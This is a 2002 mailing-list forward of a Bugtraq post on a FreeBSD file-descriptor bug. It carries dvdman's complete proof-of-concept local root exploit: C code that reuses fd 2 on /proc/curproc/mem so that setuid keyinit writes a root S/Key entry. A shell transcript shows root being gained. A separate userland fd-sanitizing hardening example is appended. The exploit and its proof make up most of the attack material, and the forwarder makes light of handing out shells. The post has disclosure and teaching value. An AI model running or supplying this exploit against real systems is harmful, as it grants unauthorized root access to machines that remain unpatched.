[FUGSPBR] Fwd: Freebsd FD exploit
Felipe Neuwald
felipe em aker.com.br
Tue Aug 20 09:24:29 BRT 2002
maybe this is interesting, eh... ;)
be careful with the little "shells" you hand out to your "very good
friends" on your servers hehehe.
Cheers,
>Mailing-List: contact bugtraq-help em securityfocus.com; run by ezmlm
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq em securityfocus.com>
>List-Help: <mailto:bugtraq-help em securityfocus.com>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe em securityfocus.com>
>List-Subscribe: <mailto:bugtraq-subscribe em securityfocus.com>
>Delivered-To: mailing list bugtraq em securityfocus.com
>Delivered-To: moderator for bugtraq em securityfocus.com
>From: "dvdman" <dvdman em l33tsecurity.com>
>To: <bugtraq em lists.securityfocus.com>
>Subject: Freebsd FD exploit
>Date: Sun, 18 Aug 2002 21:01:13 -0400
>X-Mailer: Microsoft Outlook Express 6.00.2600.0000
>
>/* Proof Of Concept exploit for the Freebsd file descriptors bug. Freebsd
>thought they fixed this months ago well guess again :P Thanks to the
>Freebsd kernel you may now enjoy local root on all freebsd <=4.6 ;) */
>
>
Felipe Neuwald
Systems Security Consultant
felipe em aker.com.br
-------------- Next Part ----------
/* Proof Of Concept exploit for the Freebsd file descriptors bug. Freebsd
thought they fixed this months ago well guess again :P Thanks to the
Freebsd kernel you may now enjoy local root on all freebsd <=4.6 ;) */
/* *I AM FREE* *I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I
AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM
FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I
AM FREE* */
/*
DVDMAN(DVDMAN em L33TSECURITY.COM)
Visit Us: irc.efnet.org #l33tsecurity
www.l33tsecurity.com
And Freebsd thought they fixed this :P
GREETS:
thanks phased for skeys from iosmash.c :)
thanks all of #l33tsecurity for support
thanks Georgi Guninski for ideas
Details:
Several months ago Joost Pol <joost em pine.nl> made public almost the same
problem. FreeBSD fixed it, but the patch does not cover all the cases. In
some cases the kernel closes fds 0..2 after they are assigned to /dev/null,
leaving the system open to an attack. If a +s file is execed and fds 0..2
are opened to /proc/curproc/{special} then the kernel forcefully closes
them and open() then reuses them.
This program makes the following skeys valid:
95: CARE LIVE CARD LOFT CHIC HILL
96: TESS OIL WELD DUD MUTE KIT
97: DADE BED DRY JAW GRAB NOV
98: MASS OAT ROLL TOOL AGO CAM
99: DARK LEW JOLT JIVE MOS WHO
PROOF:
[dvdman em xxxx:~]$ uname -a
FreeBSD xxx.xx 4.6-STABLE FreeBSD 4.6-STABLE #1: Sat Jul27 20:16:20 GMT 2002 dvdman em xxxx:/usr/obj/usr/src/sys/xxx i386
[dvdman em xxxx:~]$ gcc iosmash2.c
[dvdman em xxxx:~]$ ./a.out
Adding dvdman:
ctrl-c
[dvdman em xxxx:~]$ su
s/key 98 snosoft2
Password:
[root em xxxx:/home/dvdman]#
*/
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>   /* strerror() */
#include <errno.h>

int main(int argc, char *argv[])
{
    int f;
    int ret;

    /* Fill the descriptor table with copies of stdout, then free slots 2 and 3. */
    while (dup(1) != -1) {}
    close(2);
    close(3);

    /* Slot 2 is the lowest free descriptor, so this open() lands on fd 2. */
    f = open("/proc/curproc/mem", O_WRONLY);
    if (f == -1) fprintf(stdout, "Error in open /proc\n");
    fprintf(stdout, "press ctrl-c when adding...");

    /* Exec the setuid keyinit with fd 2 still bound to /proc/curproc/mem. */
    ret = execl("/usr/bin/keyinit",
                "\nroot 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666 01:02:03\n",
                (char *)0);
    if (ret == -1) {
        fprintf(stdout, "execl() failed: %s (%d)\n", strerror(errno), errno);
    }
    return 0;
}
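The Details section of the attached file describes the failure mode: a setuid program starts with one of fds 0..2 closed, so its first open() silently lands on a standard stream. The kernel-side fix is what the advisory is about; as an added example that is not part of dvdman's post or of FreeBSD's code, this is the userland counterpart a privileged program can apply at startup: probe fds 0..2 with fcntl(F_GETFD) and bind any closed one to /dev/null before opening anything else. Function names are assumptions of this example.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

/* Return 1 if fd refers to an open descriptor, 0 if it is closed. */
int fd_is_open(int fd)
{
    return fcntl(fd, F_GETFD) != -1;
}

/*
 * Make sure fds 0, 1 and 2 are all open before a privileged program
 * opens anything else. Each closed standard fd is bound to /dev/null.
 * Returns the number of descriptors repaired, or -1 if /dev/null could
 * not be opened onto the expected slot.
 */
int sanitize_std_fds(void)
{
    int repaired = 0;
    for (int fd = 0; fd <= 2; fd++) {
        if (fd_is_open(fd))
            continue;
        /* All lower slots are open, so open() must return exactly fd. */
        int nfd = open("/dev/null", O_RDWR);
        if (nfd != fd) {
            if (nfd != -1)
                close(nfd);
            return -1;
        }
        repaired++;
    }
    return repaired;
}

/* Open a scratch descriptor and report which slot it landed on; after
 * sanitize_std_fds() this is always >= 3, never a standard stream. */
int next_free_fd(void)
{
    int fd = open("/dev/null", O_RDONLY);
    if (fd != -1)
        close(fd);
    return fd;
}

int main(void)
{
    close(2);                       /* constructed: simulate a closed stderr */
    int repaired = sanitize_std_fds();
    printf("repaired %d std fd(s); next open() lands on fd %d\n",
           repaired, next_free_fd());
    return (repaired == 1 && next_free_fd() >= 3) ? 0 : 1;
}
```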